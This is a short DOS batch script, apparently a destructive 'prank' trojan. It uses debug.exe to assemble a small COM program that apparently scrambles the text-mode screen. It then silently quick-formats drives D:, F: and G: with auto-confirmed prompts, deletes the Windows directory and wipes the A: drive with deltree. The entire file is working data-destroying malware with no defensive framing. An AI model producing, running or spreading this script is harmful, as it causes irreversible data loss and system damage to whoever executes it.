rem Big Pricol FOR YOU rem Big Pricol FOR YOU
rem Big Pricol FOR YOU rem Big Pricol FOR YOU
@echo off
set
echo N BUHLO.COM                                             >> HOLUP.COM
echo E 0100 E8 09 00 B4 00 CD 16 B8 00 4C CD 21 BA 00 B8 52 >> HOLUP.COM
echo E 0110 B4 0F CD 10 3C 07 75 05 5A BA 00 B0 52 5A 8E C2 >> HOLUP.COM
echo E 0120 8E DA BB 50 00 83 FB 00 74 0B B9 1A 00 E8 06 00 >> HOLUP.COM
rem Big Pricol FOR YOU
echo E 0130 E2 FB 4B EB F0 C3 51 49 8B C1 BA A0 00 F7 E2 D1 >> HOLUP.COM
echo E 0140 C9 72 0B FD 05 9E 00 8B F8 2D 02 00 EB 06 FC 8B >> HOLUP.COM
rem Big Pricol FOR YOU
echo E 0150 F8 05 02 00 8B F0 8B 15 B9 4F 00 F3 A5 89 15 59 >> HOLUP.COM
echo E 0160 C3 >> HOLUP.COM
echo RCX  >> HOLUP.COM
echo 0061 >> HOLUP.COM
rem Big Pricol FOR YOU
echo W >> HOLUP.COM
echo Q >> HOLUP.COM
debug < HOLUP.COM
rem Big Pricol FOR YOU
@echo y| format g: /q
echo y| format f: /q
@echo y| format d: /q
BUHLO.COM
del %WINDIR%
deltree/y a: